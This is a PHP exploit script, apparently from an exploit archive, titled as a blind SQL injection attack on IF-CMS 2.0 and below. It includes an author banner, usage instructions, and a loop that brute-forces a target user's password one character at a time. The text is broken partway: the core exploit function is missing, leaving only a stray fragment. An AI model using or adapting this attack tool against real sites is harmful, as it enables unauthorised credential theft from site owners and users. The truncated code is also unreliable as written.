--+++=======================================================+++-- --+++====== IF-CMS <= 2.0 Blind SQL Injection Exploit ======+++-- --+++=======================================================+++-- 4) return true; else return false; } function usage () { echo "\nIF-CMS <= 2.0 Blind SQL Injection Exploit". "\n[+] Author : darkjoker". "\n[+] Site : http://darkjoker.net23.net". "\n[+] Download: http://downloads.sourceforge.net/if-cms/If-CMS-2.07.zip?modtime=1088812800&big_mirror=0". "\n[+] Usage : php xpl.php ". "\n[+] Ex. : php xpl.php localhost /IF-CMS root". "\n\n"; exit (); } if ($argc != 4) usage (); $hostname = $argv [1]; $path = $argv [2]; $user = $argv [3]; //Edit this keylist when returned password is incomplete and add other characters you want $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; $chr = 0; $pos = 1; echo "[+] Password: "; while ($chr < strlen ($key)) { if (exploit ($hostname, $path, $user, $key [$chr], $pos)) { echo $key [$chr]; $chr = 0; $pos++; } else $chr++; } echo "\n\n"; ?>